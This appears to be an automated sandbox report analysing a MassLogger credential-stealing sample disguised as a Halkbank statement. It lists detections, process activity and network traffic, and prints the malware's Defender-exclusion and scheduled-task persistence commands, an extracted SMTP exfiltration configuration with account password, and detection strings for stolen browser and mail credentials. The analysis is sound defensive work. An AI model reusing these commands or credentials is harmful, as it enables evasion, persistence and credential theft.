Edit tour

Windows Analysis Report
Halkbank_Ekstre_20241022_081224_563756.exe

Overview

General Information

Sample name:	Halkbank_Ekstre_20241022_081224_563756.exe
Analysis ID:	1541087
MD5:	f52b285b21a1d390ec4e436e11957bd6
SHA1:	b9b593e257946c3216d0e0f5aab12850e6695e4b
SHA256:	4e007a23a0658f7417c1767bf2f2a0a3722853216e9a00489f79d57b555acc9e
Tags:	exeMassLoggeruser-threatcat_ch
Infos:

Detection

MassLogger RAT, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected MassLogger RAT

Yara detected PureLog Stealer

Yara detected Telegram RAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Halkbank_Ekstre_20241022_081224_563756.exe (PID: 5788 cmdline: "C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe" MD5: F52B285B21A1D390EC4E436E11957BD6)

powershell.exe (PID: 5496 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6464 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bAZAANr.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 5376 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 5780 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bAZAANr" /XML "C:\Users\user\AppData\Local\Temp\tmpD8B4.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 2672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Halkbank_Ekstre_20241022_081224_563756.exe (PID: 3924 cmdline: "C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe" MD5: F52B285B21A1D390EC4E436E11957BD6)

bAZAANr.exe (PID: 3668 cmdline: C:\Users\user\AppData\Roaming\bAZAANr.exe MD5: F52B285B21A1D390EC4E436E11957BD6)

schtasks.exe (PID: 7392 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bAZAANr" /XML "C:\Users\user\AppData\Local\Temp\tmpF6AC.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

bAZAANr.exe (PID: 7480 cmdline: "C:\Users\user\AppData\Roaming\bAZAANr.exe" MD5: F52B285B21A1D390EC4E436E11957BD6)

cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "SMTP", "From": "kingnovasend@zqamcx.com", "Password": "Anambraeast", "Server": "zqamcx.com", "To": "kingnovaresult@zqamcx.com", "Port": 587}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000F.00000002.4557287584.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.4555924157.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2160882311.0000000004FD0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.2155425929.00000000037B9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000000.00000002.2155425929.00000000037B9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2155425929.00000000037B9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2155425929.00000000037B9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.2155425929.00000000037B9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2b9af:$a1: get_encryptedPassword 0x1c930f:$a1: get_encryptedPassword 0x1dff2f:$a1: get_encryptedPassword 0x2bcd7:$a2: get_encryptedUsername 0x1c9637:$a2: get_encryptedUsername 0x1e0257:$a2: get_encryptedUsername 0x2b74a:$a3: get_timePasswordChanged 0x1c90aa:$a3: get_timePasswordChanged 0x1dfcca:$a3: get_timePasswordChanged 0x2b86b:$a4: get_passwordField 0x1c91cb:$a4: get_passwordField 0x1dfdeb:$a4: get_passwordField 0x2b9c5:$a5: set_encryptedPassword 0x1c9325:$a5: set_encryptedPassword 0x1dff45:$a5: set_encryptedPassword 0x2d321:$a7: get_logins 0x1cac81:$a7: get_logins 0x1e18a1:$a7: get_logins 0x2cfd2:$a8: GetOutlookPasswords 0x1ca932:$a8: GetOutlookPasswords 0x1e1552:$a8: GetOutlookPasswords
Process Memory Space: Halkbank_Ekstre_20241022_081224_563756.exe PID: 5788	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: Halkbank_Ekstre_20241022_081224_563756.exe PID: 5788	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Halkbank_Ekstre_20241022_081224_563756.exe PID: 5788	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Halkbank_Ekstre_20241022_081224_563756.exe PID: 5788	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Halkbank_Ekstre_20241022_081224_563756.exe PID: 5788	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5d602:$a1: get_encryptedPassword 0x5d91b:$a2: get_encryptedUsername 0x5d3b1:$a3: get_timePasswordChanged 0x5d4d2:$a4: get_passwordField 0x5d618:$a5: set_encryptedPassword 0x5ef1b:$a7: get_logins 0x5ebcc:$a8: GetOutlookPasswords 0x5e9be:$a9: StartKeylogger 0x5ee6b:$a10: KeyLoggerEventArgs 0x5ea1b:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Halkbank_Ekstre_20241022_081224_563756.exe PID: 3924	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: bAZAANr.exe PID: 3668	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: bAZAANr.exe PID: 7480	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: bAZAANr.exe PID: 7480	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Halkbank_Ekstre_20241022_081224_563756.exe.4fd0000.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Halkbank_Ekstre_20241022_081224_563756.exe.4fd0000.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.bAZAANr.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd3a7:$a1: get_encryptedPassword 0xd6cf:$a2: get_encryptedUsername 0xd142:$a3: get_timePasswordChanged 0xd263:$a4: get_passwordField 0xd3bd:$a5: set_encryptedPassword 0xed19:$a7: get_logins 0xe9ca:$a8: GetOutlookPasswords 0xe7bc:$a9: StartKeylogger 0xec69:$a10: KeyLoggerEventArgs 0xe819:$a11: KeyLoggerEventArgsEventHandler
0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1234b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11849:$a3: \Google\Chrome\User Data\Default\Login Data 0x11b57:$a4: \Orbitum\User Data\Default\Login Data 0x1294f:$a5: \Kometa\User Data\Default\Login Data
0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd3a7:$a1: get_encryptedPassword 0xd6cf:$a2: get_encryptedUsername 0xd142:$a3: get_timePasswordChanged 0xd263:$a4: get_passwordField 0xd3bd:$a5: set_encryptedPassword 0xed19:$a7: get_logins 0xe9ca:$a8: GetOutlookPasswords 0xe7bc:$a9: StartKeylogger 0xec69:$a10: KeyLoggerEventArgs 0xe819:$a11: KeyLoggerEventArgsEventHandler
0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1234b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11849:$a3: \Google\Chrome\User Data\Default\Login Data 0x11b57:$a4: \Orbitum\User Data\Default\Login Data 0x1294f:$a5: \Kometa\User Data\Default\Login Data
0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1a7:$a1: get_encryptedPassword 0x25dc7:$a1: get_encryptedPassword 0xf4cf:$a2: get_encryptedUsername 0x260ef:$a2: get_encryptedUsername 0xef42:$a3: get_timePasswordChanged 0x25b62:$a3: get_timePasswordChanged 0xf063:$a4: get_passwordField 0x25c83:$a4: get_passwordField 0xf1bd:$a5: set_encryptedPassword 0x25ddd:$a5: set_encryptedPassword 0x10b19:$a7: get_logins 0x27739:$a7: get_logins 0x107ca:$a8: GetOutlookPasswords 0x273ea:$a8: GetOutlookPasswords 0x105bc:$a9: StartKeylogger 0x271dc:$a9: StartKeylogger 0x10a69:$a10: KeyLoggerEventArgs 0x27689:$a10: KeyLoggerEventArgs 0x10619:$a11: KeyLoggerEventArgsEventHandler 0x27239:$a11: KeyLoggerEventArgsEventHandler
0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1414b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2ad6b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13649:$a3: \Google\Chrome\User Data\Default\Login Data 0x2a269:$a3: \Google\Chrome\User Data\Default\Login Data 0x13957:$a4: \Orbitum\User Data\Default\Login Data 0x2a577:$a4: \Orbitum\User Data\Default\Login Data 0x1474f:$a5: \Kometa\User Data\Default\Login Data 0x2b36f:$a5: \Kometa\User Data\Default\Login Data
0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1a7:$a1: get_encryptedPassword 0x1acb07:$a1: get_encryptedPassword 0x1c3727:$a1: get_encryptedPassword 0xf4cf:$a2: get_encryptedUsername 0x1ace2f:$a2: get_encryptedUsername 0x1c3a4f:$a2: get_encryptedUsername 0xef42:$a3: get_timePasswordChanged 0x1ac8a2:$a3: get_timePasswordChanged 0x1c34c2:$a3: get_timePasswordChanged 0xf063:$a4: get_passwordField 0x1ac9c3:$a4: get_passwordField 0x1c35e3:$a4: get_passwordField 0xf1bd:$a5: set_encryptedPassword 0x1acb1d:$a5: set_encryptedPassword 0x1c373d:$a5: set_encryptedPassword 0x10b19:$a7: get_logins 0x1ae479:$a7: get_logins 0x1c5099:$a7: get_logins 0x107ca:$a8: GetOutlookPasswords 0x1ae12a:$a8: GetOutlookPasswords 0x1c4d4a:$a8: GetOutlookPasswords
Click to see the 18 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe", ParentImage: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe, ParentProcessId: 5788, ParentProcessName: Halkbank_Ekstre_20241022_081224_563756.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe", ProcessId: 5496, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bAZAANr" /XML "C:\Users\user\AppData\Local\Temp\tmpF6AC.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bAZAANr" /XML "C:\Users\user\AppData\Local\Temp\tmpF6AC.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\bAZAANr.exe, ParentImage: C:\Users\user\AppData\Roaming\bAZAANr.exe, ParentProcessId: 3668, ParentProcessName: bAZAANr.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bAZAANr" /XML "C:\Users\user\AppData\Local\Temp\tmpF6AC.tmp", ProcessId: 7392, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bAZAANr" /XML "C:\Users\user\AppData\Local\Temp\tmpD8B4.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bAZAANr" /XML "C:\Users\user\AppData\Local\Temp\tmpD8B4.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe", ParentImage: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe, ParentProcessId: 5788, ParentProcessName: Halkbank_Ekstre_20241022_081224_563756.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bAZAANr" /XML "C:\Users\user\AppData\Local\Temp\tmpD8B4.tmp", ProcessId: 5780, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe", ParentImage: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe, ParentProcessId: 5788, ParentProcessName: Halkbank_Ekstre_20241022_081224_563756.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe", ProcessId: 5496, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bAZAANr" /XML "C:\Users\user\AppData\Local\Temp\tmpD8B4.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bAZAANr" /XML "C:\Users\user\AppData\Local\Temp\tmpD8B4.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe", ParentImage: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe, ParentProcessId: 5788, ParentProcessName: Halkbank_Ekstre_20241022_081224_563756.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bAZAANr" /XML "C:\Users\user\AppData\Local\Temp\tmpD8B4.tmp", ProcessId: 5780, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T12:00:21.861081+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49713	132.226.247.73	80	TCP
2024-10-24T12:00:22.376699+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49721	132.226.247.73	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.raw.unpack

Malware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "kingnovasend@zqamcx.com", "Password": "Anambraeast", "Server": "zqamcx.com", "To": "kingnovaresult@zqamcx.com", "Port": 587}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\bAZAANr.exe

ReversingLabs: Detection: 65%

Multi AV Scanner detection for submitted file

Source: Halkbank_Ekstre_20241022_081224_563756.exe

ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\bAZAANr.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Halkbank_Ekstre_20241022_081224_563756.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Halkbank_Ekstre_20241022_081224_563756.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49754 version: TLS 1.0

Source: Halkbank_Ekstre_20241022_081224_563756.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: hdNu.pdb source: Halkbank_Ekstre_20241022_081224_563756.exe, bAZAANr.exe.0.dr
Source:	Binary string: hdNu.pdbSHA2567 source: Halkbank_Ekstre_20241022_081224_563756.exe, bAZAANr.exe.0.dr

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 4x nop then jmp 027A58D9h	9_2_027A5628
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 4x nop then jmp 027A6000h	9_2_027A5BE2
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Code function: 4x nop then jmp 027A6000h	9_2_027A5F2E
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 4x nop then jmp 02895782h	15_2_02895358
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 4x nop then jmp 028951B9h	15_2_02894F08
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Code function: 4x nop then jmp 02895782h	15_2_028956AF

Source: global traffic

HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49713 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49721 -> 132.226.247.73:80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49754 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.00000000029FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.00000000029FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comd
Source: Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.00000000029EC000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.00000000029FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.0000000002981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.00000000029FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/d
